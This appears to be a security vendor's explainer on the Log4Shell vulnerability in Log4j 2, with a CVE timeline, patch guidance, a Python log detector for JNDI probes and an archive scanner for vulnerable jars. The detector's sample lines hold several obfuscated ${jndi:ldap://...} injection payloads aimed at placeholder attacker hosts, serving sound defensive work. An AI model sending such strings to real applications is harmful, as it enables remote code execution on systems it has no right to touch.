One in ten systems might be affected by the critical Log4Shell vulnerability found in Log4j version 2. Log4Shell can be used to initiate a ransomware attack.
The Log4j vulnerability may affect as many as one in ten systems.
According to GitHub, over 1,800 repositories have a dependency on Log4j.
An RCE vulnerability with the highest possible CVSS severity (10.0).
Can be used for ransomware attacks, crypto mining, botnets, and data exfiltration.
Log4Shell is a software vulnerability in Apache Log4j version 2. On paper it looks like hundreds of other vulnerabilities, but with some significant differences. It might impact as many as one in ten systems, and it can be exploited remotely by anyone who can get a string logged by the application. That combination of reach and ease of exploitation makes it without question one of the most serious, if not the most serious, vulnerability seen in recent years, and every organization needs to take action proactively.
Log4j is a popular open-source Java library for logging messages from applications. The vulnerability, published as CVE-2021-44228, enables a remote attacker to take control of an internet-facing system if it runs an affected version of Log4j 2. The vulnerability is commonly known as Log4Shell.
As one of the most widely used logging frameworks in the Java ecosystem, Apache Log4j 2 has been integrated into thousands of applications across the industry, including services from providers such as Apple, Google, Microsoft, and Cloudflare, and platforms like Twitter and Steam.
Log4j records messages emitted by software, which operators then search for errors. The data it handles is broad, from basic browser and web-page information to technical details about the system.
Log4j 2 does not just write simple strings: it can also evaluate lookup expressions embedded in log messages to enrich them, for example with environment or date values. One of these lookups, the JNDI lookup, can contact other sources such as internal directory services over LDAP, and that is the feature Log4Shell abuses.
| Date | CVE | Event |
| --- | --- | --- |
| December 6, 2021 | CVE-2021-44228 | Apache issued a patch for CVE-2021-44228, version 2.15.0. |
| December 13, 2021 | CVE-2021-45046 | The 2.15.0 fix was found to be incomplete in certain non-default configurations, resulting in a second CVE, CVE-2021-45046. |
| December 13, 2021 | | Apache released a second patch, version 2.16.0, which disables JNDI by default and removes message lookups entirely. |
| December 17, 2021 | CVE-2021-45105 | Apache released a third patch, version 2.17.0, to fix a related denial-of-service vulnerability, CVE-2021-45105. |
| December 28, 2021 | CVE-2021-44832 | Apache released a fourth patch, version 2.17.1, to address CVE-2021-44832, a code-execution issue in the JDBC Appender that requires the attacker to control the logging configuration. |
Log4Shell is an RCE (remote code execution) vulnerability, meaning that anyone who can reach the application from the outside can exploit it. In this case the attack vehicle is ordinary text: a crafted string sent in any field the application logs. The Apache Software Foundation, which publishes the Log4j 2 library, gave the vulnerability a CVSS score of 10 out of 10, the highest possible severity, because of its potential for widespread exploitation and how easy it is to exploit. While mitigation evolves and the damage unfolds, the fundamentals of the Log4Shell vulnerability won't change.
The vulnerability was first reported to the Apache Software Foundation by a security researcher at Alibaba Cloud on November 24, 2021. Exploitation in the wild was first widely observed on December 9 against servers hosting the game Minecraft. Later forensic analysis showed that cybercriminals had discovered the gap earlier and had been exploiting it since at least December 1, 2021.
Watch this recorded webinar, featuring our CTO, Erik Torlén, and Mihail Lupan, Lead Security Engineer, to learn more about how organizations are affected by the Log4j vulnerability and how you can detect and remediate it.
Log4Shell was a zero-day vulnerability: it was being exploited in the wild before a fix was available, so cybercriminals knew about it before most defenders did. What makes it so dangerous is how widespread the Log4j 2 library is. It is present in major platforms from vendors like AWS (Amazon Web Services) to VMware and in software services large and small. The web of dependencies among affected platforms and services means patching can be a complex and time-consuming process, and in many cases it is not possible within a reasonable timeframe.
The ease of exploiting the vulnerability compounds its impact. The Log4j 2 library controls how applications format and record log messages. The vulnerability lets an attacker who can get a crafted string into a logged message (a User-Agent header, a username, a chat message) trick the application into requesting and executing code from a server the attacker controls. Cybercriminals can remotely take over any internet-connected service that uses an affected version of the Log4j library anywhere in its software stack.
Because Log4j 2 evaluates JNDI lookups found in log messages, and JNDI in turn can fetch objects from LDAP and RMI servers, an attacker can feed Log4j 2 a string of the form ${jndi:ldap://<attacker host>/...} from the outside and make the application connect to that host and load and execute the code it returns.
How cybercriminals exploit Log4j 2 depends on the specifics of the affected system. So far, the vast majority of malicious activity has been mass scanning to fingerprint vulnerable systems, but cybercriminals have also exploited the vulnerability to compromise virtualization infrastructure, install and run ransomware, steal system credentials, take broad control of compromised networks, and exfiltrate data.
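Mass scanning leaves the probe string in whatever the application logged, which makes web-server and application logs the quickest place to see whether you were targeted. The following Python detector is an added example, not code from this article or from the Apache project: it undoes the URL-encoding and nested-lookup tricks that scanners use to hide the `${jndi:...}` string (`${lower:j}`, `${::-j}`, `${upper:ı}`) before matching, because a naive search for the literal `jndi` misses most real probes. The sample log lines, the regexes and the 203.0.113.0/24 addresses are constructed for this example.

```python
import re
import sys
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Constructed sample access-log lines (not captured traffic). Attacker hosts use the
# 203.0.113.0/24 documentation range. Line 0 is benign; the others are probes written the
# way scanners really send them: plain, nested lower:/upper: lookups, the ${x:-default}
# trick, URL-encoding in the query string, and a Unicode case trick (dotless i).
SAMPLE_LOG_LINES: List[str] = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:14 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.10:1099/x}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:15 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fexample.test%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:14:02:16 +0000] "GET / HTTP/1.1" 200 512 "-" "${jnd${upper:ı}:ldap://203.0.113.10:1389/a}"',
]

# An innermost ${...} expression: no further "${" or "}" inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# After de-obfuscation: a JNDI lookup using any of the protocol handlers seen abused in the wild.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|https?)\s*:", re.IGNORECASE)


def _resolve(match: "re.Match[str]") -> str:
    """Evaluate one innermost lookup the way Log4j's StrSubstitutor would, for the
    lookups attackers use as obfuscation; anything else is left literally in place."""
    body = match.group(1)
    name, sep, arg = body.partition(":")
    if name.lower() == "jndi":
        return match.group(0)            # terminal: this is what we want to surface
    if ":-" in body:                     # ${anything:-default} -> default, e.g. ${::-j} -> j
        return body.split(":-", 1)[1]
    if sep and name.lower() == "lower":
        return arg.lower()
    if sep and name.lower() == "upper":
        return arg.upper()               # "ı".upper() == "I", which is the Unicode trick
    return match.group(0)


def normalize(text: str, max_rounds: int = 20) -> str:
    """Repeatedly URL-decode and resolve nested lookups until the string stops changing.
    The round cap bounds the work on adversarial input."""
    for _ in range(max_rounds):
        resolved = _INNER.sub(_resolve, unquote(text))
        if resolved == text:
            break
        text = resolved
    return text


def find_jndi_probe(line: str) -> Optional[str]:
    """Return the de-obfuscated ${jndi:...} expression carried by a log line, or None."""
    norm = normalize(line)
    m = _JNDI.search(norm)
    if not m:
        return None
    end = norm.find("}", m.start())
    return norm[m.start(): end + 1] if end != -1 else norm[m.start():]


def scan_lines(lines: List[str]) -> List[Tuple[int, str]]:
    """(line index, decoded payload) for every line that carries a probe."""
    hits = []
    for i, line in enumerate(lines):
        payload = find_jndi_probe(line)
        if payload is not None:
            hits.append((i, payload))
    return hits


if __name__ == "__main__":
    # Read a log from stdin if one is piped in, otherwise run over the constructed sample.
    source = sys.stdin.read().splitlines() if not sys.stdin.isatty() else SAMPLE_LOG_LINES
    for idx, payload in scan_lines(source):
        print(f"line {idx}: {payload}")
```

A hit means a probe reached the application, not that it was exploited; confirm by correlating the timestamp with outbound LDAP, RMI or DNS connections from the host to the address in the payload, which is where actual exploitation becomes visible.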
Three CVEs related to Log4Shell were published in December 2021, followed by a fourth, CVE-2021-44832, on December 28 (see the timeline above). To protect systems that use Log4j 2 against all of them, IT teams should upgrade to Log4j 2.17.1 or later for Java 8 and up (2.12.4 for Java 7, 2.3.2 for Java 6).
| CVE | Impact | Fixed in |
| --- | --- | --- |
| CVE-2021-44832 (fourth) | Remote code execution through the JDBC Appender when an attacker can modify the logging configuration; lower severity because it needs that write access. | Log4j 2.17.1 for Java 8 and up; 2.12.4 for Java 7; 2.3.2 for Java 6. |
| CVE-2021-45105 (third) | Self-referential lookups could cause uncontrolled recursion, letting an attacker who controls logged data trigger a denial of service. | Log4j 2.17.0 for Java 8 and up; 2.12.3 for Java 7; 2.3.1 for Java 6. |
| CVE-2021-45046 (second) | The fix in 2.15.0 was incomplete in certain non-default configurations: crafted input could cause an information leak or, in some setups, remote code execution. | Log4j 2.16.0 for Java 8 and up; 2.12.2 for Java 7. |
| CVE-2021-44228 (original) | An attacker who controls logged data could execute arbitrary code through the JNDI message-lookup functionality. | Log4j 2.15.0 (partial); fully addressed in 2.16.0 for Java 8 and up and 2.12.2 for Java 7. |
A vast number of software vendors are impacted; Cisco alone has hundreds of affected products and systems, and many other vendors have published their own lists of affected applications.
If your application uses Log4j
Organizations that use Log4j 2 in their applications and infrastructure should update it immediately. The same applies to third-party applications that bundle it. Version 2.16.0 disables JNDI by default and removes message lookups, which closes Log4Shell itself; 2.17.0 and 2.17.1 fix the follow-on denial-of-service and JDBC Appender issues, so the target should be 2.17.1 or later (2.12.4 for Java 7, 2.3.2 for Java 6).
If you use affected systems
Because Log4Shell affects so many systems and is easy to exploit, you need to act as soon as possible, starting with systems that are exposed to the internet.
In environments with hundreds or thousands of systems, the first step is to identify which systems are impacted. This can be done using our vulnerability management platform. Then, if possible, patch the system. If patching is not an option, make sure the system is isolated so unauthorized users cannot reach it. Where an upgrade has to wait, Apache's documented fallback for the JNDI-related CVEs is to delete the JndiLookup class (org/apache/logging/log4j/core/lookup/JndiLookup.class) from the log4j-core jar and restart the application; setting the log4j2.formatMsgNoLookups system property to true is not sufficient on its own, because CVE-2021-45046 showed it can be bypassed in some configurations. Neither fallback addresses the later denial-of-service and JDBC Appender issues, so treat it as a stopgap, not a substitute for upgrading.
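The identification step above can also be done host by host without an agent, by inspecting the archives an application ships with. The following Python script is an added example, not Holm Security's product or Apache's code: it walks a directory, opens every jar, war and ear (including jars nested inside wars, where most log4j-core copies actually live), reads the Maven pom.properties that log4j-core carries, checks whether JndiLookup.class is still present, and reports which of the four CVEs still apply using the fixed-version thresholds from Apache's Log4j security page. The `Finding` type, the `!` path convention for nested entries and the fixture-building function are this example's own; the fixture is a constructed archive with metadata only, not a real Log4j build.

```python
import io
import re
import sys
import zipfile
from dataclasses import dataclass
from pathlib import Path
from typing import Dict, Iterator, List, Tuple

# Maven metadata that Apache ships inside log4j-core jars, and the class whose removal
# Apache documents as the fallback mitigation for the two JNDI-related CVEs.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")

# First release of each maintained branch that fixes each CVE (Apache Log4j security page).
# jndi=True marks the CVEs that deleting JndiLookup.class also mitigates; the
# denial-of-service and JDBC Appender issues live elsewhere in the code and are not.
CVES: List[Tuple[str, bool, Dict[str, Tuple[int, int, int]]]] = [
    ("CVE-2021-44228", True,  {"2.x": (2, 15, 0), "2.12.x": (2, 12, 2), "2.3.x": (2, 3, 1)}),
    ("CVE-2021-45046", True,  {"2.x": (2, 16, 0), "2.12.x": (2, 12, 2), "2.3.x": (2, 3, 1)}),
    ("CVE-2021-45105", False, {"2.x": (2, 17, 0), "2.12.x": (2, 12, 3), "2.3.x": (2, 3, 1)}),
    ("CVE-2021-44832", False, {"2.x": (2, 17, 1), "2.12.x": (2, 12, 4), "2.3.x": (2, 3, 2)}),
]


@dataclass
class Finding:
    path: str                  # outer archive, then nested entries joined with "!" (our convention)
    version: str
    jndi_lookup_present: bool
    cves: List[str]            # CVEs this copy is still exposed to


def parse_version(text: str) -> Tuple[int, int, int]:
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0). Qualifiers are ignored."""
    nums = [int(n) for n in re.findall(r"\d+", text.split("-")[0])][:3]
    while len(nums) < 3:
        nums.append(0)
    return nums[0], nums[1], nums[2]


def branch_of(v: Tuple[int, int, int]) -> str:
    if v[:2] == (2, 3):
        return "2.3.x"     # Java 6 line
    if v[:2] == (2, 12):
        return "2.12.x"    # Java 7 line
    return "2.x"           # Java 8+ line (and the early 2.0-2.2 releases)


def outstanding_cves(version: str, jndi_lookup_present: bool) -> List[str]:
    """CVEs that still apply to this log4j-core version, given whether JndiLookup.class is present."""
    v = parse_version(version)
    branch = branch_of(v)
    return [cve for cve, jndi, fixed in CVES
            if v < fixed[branch] and (jndi_lookup_present or not jndi)]


def scan_archive(data: bytes, path: str, depth: int = 0, max_depth: int = 6) -> Iterator[Finding]:
    """Yield a Finding for every log4j-core inside an archive, recursing into nested
    archives. The depth cap stops a crafted archive from recursing without bound."""
    if depth > max_depth:
        return
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPS in names:
            props = zf.read(POM_PROPS).decode("utf-8", "replace")
            m = re.search(r"^version=(.+)$", props, re.MULTILINE)
            version = m.group(1).strip() if m else None
        jndi = JNDI_LOOKUP in names
        if version:
            yield Finding(path, version, jndi, outstanding_cves(version, jndi))
        elif jndi:
            # Shaded or repackaged copy without Maven metadata: version unknown, treat as exposed.
            yield Finding(path, "unknown", True, ["version unknown; JndiLookup present"])
        for name in sorted(names):
            if name.lower().endswith(ARCHIVE_EXT):
                yield from scan_archive(zf.read(name), f"{path}!{name}", depth + 1, max_depth)


def scan_tree(root: Path) -> List[Finding]:
    """Scan every archive under a directory."""
    return [f for p in root.rglob("*") if p.is_file() and p.suffix.lower() in ARCHIVE_EXT
            for f in scan_archive(p.read_bytes(), str(p))]


def build_sample_war(version: str, keep_jndi_lookup: bool) -> bytes:
    """Constructed fixture: a WAR wrapping a fake log4j-core jar that holds only the metadata entries."""
    jar = io.BytesIO()
    with zipfile.ZipFile(jar, "w") as z:
        z.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        if keep_jndi_lookup:
            z.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # class-file magic as a stand-in, not real bytecode
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as z:
        z.writestr("WEB-INF/web.xml", "<web-app/>")
        z.writestr(f"WEB-INF/lib/log4j-core-{version}.jar", jar.getvalue())
    return war.getvalue()


if __name__ == "__main__":
    # Scan a real tree if a path is given, otherwise demonstrate on the constructed fixture.
    findings = scan_tree(Path(sys.argv[1])) if len(sys.argv) > 1 else \
        list(scan_archive(build_sample_war("2.14.1", True), "app.war"))
    for f in findings:
        state = "present" if f.jndi_lookup_present else "removed"
        print(f"{f.path}: log4j-core {f.version}, JndiLookup {state}, {', '.join(f.cves) or 'no outstanding CVEs'}")
```

Run it against the directories your Java services deploy from (application servers' lib and webapps folders, container image layers). Two limitations worth knowing: a log4j-core copy that has been shaded into another jar without its pom.properties is reported with an unknown version, and a copy that is present on disk but not actually on a running application's classpath is still reported, so the output is an inventory to triage, not a verdict.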
Vulnerability management solution
Holm Security VMP is a modern vulnerability management solution delivering unparalleled 360-degree coverage and comprehensive insight. Detect vulnerabilities, assess risk, and prioritize remediation for every asset in your entire infrastructure.